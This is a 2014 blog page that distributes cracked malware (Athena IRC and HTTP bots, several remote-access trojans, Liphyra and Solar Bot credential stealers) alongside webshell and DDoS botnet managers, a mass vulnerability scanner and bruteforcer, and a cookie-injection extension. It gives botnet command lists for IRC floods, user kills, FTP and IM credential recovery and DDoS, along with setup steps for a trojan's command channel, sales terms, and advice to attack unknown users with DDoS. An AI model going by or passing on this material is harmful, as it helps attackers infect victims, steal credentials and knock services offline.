Wednesday, August 6, 2014

Athena HTTP Bot v1.0.8 [Cracked]



Download
#######################
https://www.dropbox.com/sm/create/Athena%20HTTP%20Builder%20v1.0.8.rar

Posted by at 1 comment:

Athena IRC Bot v2.4.0 [Cracked] 



searched item!filesearch.stop - Ends any of the existing three above types of file searches
Recovery Commands
!recovery.ftp – Outputs existing FTP logins on the bot computer!recovery.im – Outputs existing IM logins on the bot computer
Website View Commands
!view http://website.com/ - Views a given website in a random existing browser visibly!view.hidden http://website.com/ - Views a given website in a random existing browser hidden!smartview.add http://website.com/ 1080 300 - Adds a given URL to the 'SmartView' queue-1080 is a range of 1080 seconds to choose a number of seconds from before opening the webpage-300 is a range of 1080 seconds to choose a number of seconds from before closing the webpage!smartview.del http://website.com/ - Deletes a given URL from the 'SmartView' queue if it exists!smartview.clear - Clears the entire 'SmartView' queue
IRC War Commands
!war.connect irc.server.net 6667 3 – Connects to a given IRC in multiple sockets (3 in this case is the maxattempted concurrent connections)!war.disconnect – Disconnects from a previously connected to IRC!war.status – Outputs the amount of verified connections to IRC and the status of what the bot is currentlydoing!war.register – Attempts to register a nickname through NickServ. It will bypass some NickServ security-modules.!war.register.stop – This will abort the registration attempt.!war.raw PRIVMSG #channel :raw message – Submits a RAW IRC command!war.join #channel channelkey – Joins a channel with an optional key!war.part #channel part message – Parts a channel with an optional part message!war.msg user/#channel message here – Sends a message to a given user or channel!war.notice user/#channel message here – Sends a notice to a given user or channel!war.invite user – Invites a user to a random channel. Clients that have auto-join on invite are affectedbadly!war.ctcp user – Floods a user with CTCP requests. This often disconnects users!war.dcc user – Floods a user with DCC requests. This often disconnects users!war.kill.user nickname – Attempts to kill a user from IRC!war.kill.user.multi nick1 nick2 nick3 - Attempts to kill a list of users from IRC!war.flood.channel #channel – Floods a given channel!war.flood.channel.hop #channel – Floods a channel through mass joins and parts!war.flood.anope – Floods Anope services. Anope will crash if enough bots are used.!war.stop – Stops an existing flood
 
FAQ:
Q:
How can I get an FTP?
A:
 
Use google to find a free provider if you don't want to set up your own. You can also use recovered FTP logins from your bots.
Q:
What does it mean when my bots leave IRC and say "Connection reset by peer" and "Ping timeout" ?
A:
It means your bots connection to IRC has been cut in some way. Possible reasons your bot would disconnect are: Anti-Virus detections, severed internet connection, etc. "Client exited" means that your bot logged off or shut down their computer.
Q:
What crypters are compatible with Athena?
A:
 
I do not know, as I do not own any crypters. I can not and will not vouch for any of them.
Q:
What hosting provider should I use to host my bots?
A:
S
ame answer as what crypter you should use. I do not want to be responsible for naming your provider.
Q:
What is the difference between "!view.*" and "!smartview.*" ?
A:
 
The "!view.*" commands opens a given website URL inside a random existing browser on the bot computer(Opera, Firefox, Internet Explorer, Chrome, or Maxthon) the instant you submit the command. The "!smartview.*" commands wait a random amount of time before opening the website URL in a random existing browser, and wait a random amount of time before closing it.
Q:
Should I use startup on my crypter?
A:
 
The bot has everything it needs to operate properly built into it. I suggest you use a little settings as possible on your crypter.
Q:
What should I do about a user I do not recognise in my IRC?
A:
 
Attack them with DdoS and/or IRC War floods! 
Tips:
•
Allow bots to have cooldown time inbetween hefty commands
•
It is good to try a variety of different floods when trying to take a website offline, as differentservers are more-vulnerable to different kinds of floods
•
ECF and UDP floods are best for servers hosting gameservers, VoiP, TeamSpeak, IRC, etc.
•
Play with the bot a bit and become familiar with it. Using it will eventually become much easierand fluent.
•
Bots will respond to a command set as the topic, encrypted commands included
 
Pricing:
100$ -
Solitary bin of Athena built to customer-specified configuration
10$ -
Rebuild / Update of bin
15$ -
I will set up your IRC myself so it is most-suitable for Athena on a server of yours throughTeamViewer, join.me, PuTTY, etc.
-Prices are not permenant and can be subject to change at any point in time-After purchase, it is up to the buyer to contact either me. I will not chase you down.-PayPal and Liberty Reserve are accepted.
Bin Settings:
Botkill on Start(proactive) – 
The botkiller will start on execution. It will attempt to kill its parent process aswell as any other existing bots on the system. It is proactive, meaning it will continue to botkill any botson the system until you specificly command it to stop. It can be toggled with !botkill.start / !botkill.stop
Botkill on Start(one cycle)
– The botkiller will start on execution. It will attempt to kill its parent process aswell as any other existing bots on the system. It will cycle through the botkiller only once.
Encrypted IP – 
Athena will decrypt the IP the DNS resolves to into the actual IRC IP. You are providedwith a tool to convert the actual IP into the encrypted one after purchase.
Silent by Default
– There is no bot output by default on join to IRC. '!irc.silent off' will toggle output backto normal. (no recommended)
(Also note: Athena is a modular bot, meaning any of its features can be removed/put back in on request)
Terms Of Service:
•
There is no reselling of Athena
•
All sales are final; no refunds
•
I reserve the right to deny sales to any user if necessary
•
Scams
will
result in negative consequences
•
Disrespect will result in no more support and no more rebuilds/updates. It will not be tolerated.

Download
==========
https://www.dropbox.com/sm/create/Athena%20IRC%20Builder%20v2.4.0.zip






Posted by at 4 comments:

LuxNET Rat Cracked By ıllıllıMя HackeяsDzıllıllı


Download
#############
https://www.dropbox.com/sm/create/LuxNET%20Cracked%20By%5B%C4%B1ll%C4%B1ll%C4%B1M%D1%8F.Hacke%D1%8FsDz%C4%B1ll%C4%B1ll%C4%B1%5D.zip
Posted by at 1 comment:

A7M3D-Rat V.0.1 (Twitter Instead Of No-Ip)


How to use:

1- create twitter account
2- go to settings>profile https://twitter.com/settings/profile
3- put this in bio:
Code:
%ip%127.0.0.1%none%
4-replace 127.0.0.1 with your external ip (http://ping.eu/)
5- run A7m3d-Rat v.0.1 > build > put your twitter
account user name>port> slave name perfix
6- Have Fun!

<<<Download>>>
https://www.dropbox.com/sm/create/A7m3d-Rat.zip
Posted by at 1 comment:

Xtreme Rat 3.7


Download
#######
https://www.dropbox.com/sm/create/Xtreme%20RAT%203.7.rar
Posted by at 1 comment:

Tp-Rat v0.2.6


Download
=========
https://www.dropbox.com/s/mmlr6yekw8jthcp/Tp-RAT%20v0.2.6.rar
Posted by at No comments:

Liphyra Bot+Builder+Src




I know you would like it based on Atrax Panel
C&C
RevSocks5
PwdGrabber
GRABS FOLLOWING BROWSERS
Chrome
Filezilla
Firefox
Internet Explorer
Opera
Pidgin
Safari
DDoS:
Slowloris
HTTP-Flood
SYN-Flood
UDP-Flood
Steam plugin

Download
##########
https://www.dropbox.com/s/oa07y8zn3yttoxs/Liphyra%20bot.zip
Posted by at No comments:

SafeLoader v2.2 By Scorpio [OPEN SOURCE]

SafeLoader v2.2 By Scorpio [OPEN SOURCE]


Download
#################
https://www.dropbox.com/s/v0iqptsbk16b792/SafeLoader.rar
Commands:

Download & Execute First indicates the url to the file, then the name you want to save the file, separated by "::".
For Example : http://www.site.net/file.exe::filename.exe

Update: Enter the url to the file.
Uninstall: Do not put anything, if required add a space or whatever you want.
Posted by at 1 comment:

Solar Bot Crack | Ring 3 | FormGrabber | DDoS | Socks 5

Solar Bot Crack | Ring 3 | FormGrabber | DDoS | Socks 5

<<<Download>>>
https://www.sendspace.com/file/nm5isp
Posted by at No comments:

File Spoofer [PNG & JPG] By LEGEND

File Spoofer [PNG JPG] By LEGEND


<<<Download>>>
https://www.dropbox.com/s/bnxmbpxf4ph37lp/File%20Spoofer%20%5BPNG%20_%20JPG%5D%20By%20LEGEND.rar
Posted by at No comments:

Tuesday, August 5, 2014

QuasiBot 0.2

Agenda

QuasiBot is a complex webshell manager written in PHP, which operate on web-based backdoors implemented by user himself. Using prepared php backdoors, quasiBot will work as C&C trying to communicate with each backdoor. Tool goes beyond average web-shell managers, since it delivers useful functions for scanning, exploiting and so on. It is quasi-HTTP botnet, therefore it is called.
All data about bots is stored in SQL database, ATM only MySQL is supported. TOR proxy is also supported, the goal was to create secure connection between C&C and backdoors; using SOCKS5, it is able to torify all connections between you and web server. All configuration is stored in config file. QuasiBot it's still under construction so i am aware of any potential bugs.
You will need any web server software; tested on Linux, Apache 2.2 and PHP 5.4.4. Fully written in PHP.

How it works?

  • quasiBot is operating on web-shells delivered by user, each backdoor is being verified by md5 hash which changes every hour
    quasiBot (C&C) -[request/verification]-> Bots (Webshells) -[response/verification]-> quasiBot (C&C) -[request/command]-> Bots (Webshells) -[response/execution]-> quasiBot (C&C)
  • Backdoors consists of two types, with and without DDoS module, source code is included and displayed in home page;
  • Connection between C&C and server is being supported by curl, TOR proxy is supported, User Agent is being randomized from an array
    quasiBot (C&C) -[PROXY/TOR]-> Bots (Webshells) <-[PROXY/TOR]- quasiBot (C&C)
  • Webshells can be removed and added at 'Settings' tab, they are stored in database
  • 'RSS' tab contain latest exploits and vulnerabilities feeds
  • 'RCE' tab allows to perform Remote Code Execution on specific server using selected PHP function
  • 'Scan' tab allows to resolve IP or URL and perform basic scan using nmap, dig and whois - useful in the phase of gathering information
  • 'Pwn' tab stands for few functions, which generally will help collect informations about server and try to find exploits for currently used OS version using Exploit Suggestor module
  • 'MySQL Manager', as the name says, can be used to perform basic operations on specific database - it could be helpful while looking for config files that include mysql connections on remote server; it also displays some informations about it's envoirment
  • 'Run' tab allows you to run specific command on every bots at once
  • 'DDoS' tab allows you to perform UDP DoS attacks using all bots or single one, expanded backdoor is required
  • 'Shell' tab allows you to spawn reverse or bind shell; you may pick between few languages that will be used for creating reverse shell
  • You may enable authorisation module, user is being validated by session, auth credentials are stored in config file, not in db; using Cookie Auth, user won't be able to use quasiBot until specific cookie will be used
  • Whole front-end is maintaned by a pleasant, functional interface

Running quasi for first time

  • Move all files to prepared directory, change default settings in config file (config.php)
  • Visiting quasiBot for the first time will create needed database and it's structure
  • In 'Settings' tab, you are able to add and delete shells, you're ready to go
  • Using authorisation? To logout, simply add GET logout to current URL, like quasi/index.php?logout

Todo

  • Windows support in 'PWN' module
  • Automatic attacks on servers
  • Optimization
  • ???

Changelog 0.2

  • Added authorization (Sessions / Cookie Auth)
  • Added Shell Module (Reverse / Bind shell)
  • Added Linux Exploit Suggestor module
...and ofc., it's for educational purposes only ;)

Download

https://github.com/Smaash/quasibot
Posted by at 1 comment:

Sunday, August 3, 2014

Smart Pentester



Smart Pentester is an SSH based Penetration Testing Framework. It provides a GUI for well known tools like nmap, hping, tcpdump, volatility, hydra and etc.

Smart Pentester Framework will provide you a User Interface for Penetration testing, Malware Analysis, Forensic Analysis, Cyber Intelligence, Advanced packet generation techniques and more...

http://smartpentester.com/downloads.html

Posted by at 1 comment:

:::BOTdr4g0n:::

BOTNET SSH Manager

The Botdr4g0n is a focused tool for DDOS attack on SSH BOT management and installation tools for distributed attacks. still has appeal as a tool to add AES to encrypt attack and leave the data protected by a key. Use key [tab] for complete command in tool.

Video Demo


Documentation

Command main

The main controls are fundamental to the operation of it, used "use create + [host] + [user] + [password]" to the database adds a new bot, then you can use "add_attack" which enables all bot to receive commands.
use status Used for List all BOT added in database;
use create [host] [user] [pass] Create or add a new BOT;
use add_Attack Add the bot to attack;
use set-commad [command] Run the command ALL BOT;

Command of Attack

The attack commands are two tools used to "G3M" and "floodSYN.py", this does not prevent the attacker can install other command-line tool to use as pivor attack.
use install_flood Install all bots flood.py DDOS;
use install_g3m Install G3m for attack;
use attack_start [target][port] Attack SYN flood all BOT;
use attack_g3m [target][port] Attack G3m website Turbo;

Command Encrypt

The command data encryption with algorithm AES using a key, thereby protecting the entire database of your BOT.
use encrypt [key] Encrypt the data of the Bank;
use descrypt [key] Descryt the data of the Bank;

Command Delete database

Used for delete BOT of database.
use delete_all Delete all BOT of Database;
use delete [id] Clear ID for the database;
use clear_install Delete all tool installed in BOT;
Info/Download:
https://github.com/msfcd3r/botdr4g0n
Posted by at 1 comment:

Netsparker v3.5.3.0



Secure your website

Netsparker Web Application Security Scanner can find and report web application vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) and security issues on all web applications and websites regardless of the platform and the technology they are built on.

Netsparker is very easy to use and its unique detection and safe exploitation techniques allow it to be dead accurate in reporting hence it is the first and only False Positive Free web vulnerability scanner, therefore users can focus on remediating reported vulnerabilities and security issues without wasting time on learning how to use the web vulnerability scanner or verify its findings. 


http://www.datafilehost.com/d/ffdd6218
Posted by at No comments:

FuckShitUp 0.1 - Multi Vulnerabilities Scanner




Download:
https://github.com/Smaash/fuckshitup


Basically, FSU is bunch of tools written in PHP-CLI. Using build-in functions, you are able to grab url's using search engines - and so, dork for interesting files and full path disclosures. Using list of url's, scanner will look for Cross Site Scripting, Remote File Inclusion, SQL Injection and Local File Inclusion vulnerabilities. It is able to perform mass bruteforce attacks for specific range of hosts, or bruteforce ssh with specific username taken from FPD. Whenever something interesting will be found, like vulnerability or broken auth credentials, data will be saved in .txt files - just like url's, and any other files. FSU is based on PHP and text files, it's still under construction so i am aware of any potential bugs. Principle of operation is simple.

More url's -> more vuln's. For educational purposes only.

Data grabbing:
URL's (geturl/massurl) -> (scan)
Configs, Databases, SQLi's (dork)
Full Path Disclosures / Users (fpds) -> (brutefpds)
Top websites info (top)

Massive scanning
XSS, SQLi, LFI, RFI (scan)
FTP, SSH, DB's, IMAP (multibruter)
Accurate SSH bruteforce (brutefpds)




Web Apps
Grab url's via 'geturl' or 'massurl' (massurl requires list of tags as file)
Scan url's parameters for vulns with 'scan'

Servers
Pick target, get ip range
Scan for services on each IP and bruteforce with 'multibruter'
Grab full path disclosures, and so linux usernames
Perform SSH bruteforce for specific user with 'brutefpds'

Info grabbing
Use 'dork' for automatic dorking
Use 'fpds' for full path disclosure grabbing
Use 'search' for searching someone in ur databases
Use 'top' for scanning all top websites of specific nation

Others
'Stat' shows actual statistics and informations
'Show' display specific file
'Clear' and 'filter' - remove duplicates, remove blacklisted url's


Others

MultiBrtuer requirements (php5):

php5-mysql - for mysql connections
php5-pgsql - for postgresql connections
libssh2-php - for ssh connections
php5-sybase - for mssql connections
php5-imap - for imap connections


TODO:

Fix problems with grabbing large amount of url's
More search engines
SQL Injector
RFI shell uploader
FSU is not secure as it should be
Posted by at No comments:

Cookie-Injecting-Tools 1.0.0

Cookie-Injecting-Tools 1.0.0

It's a chrome extension Cookie injecting tools includeing injecting ,editing ,adding ,removeing cookies.
Easy to use.
1.Inject Cookies

 paste your cookies which may be hijacked from wireshark ,tcpdump, xss attack ,etc. make sure that it's splitted by ";"
then click the button "Inject Cookies"
2.View Cookies

input the keywords of the domains you want to watch.

3.Edit Cookies

click the "Edit" button ,it will skip to Edit Interface.


<<<Download>>>
https://github.com/lfzark/cookie-injecting-tools/
Posted by at No comments:
Subscribe to: Posts (Atom)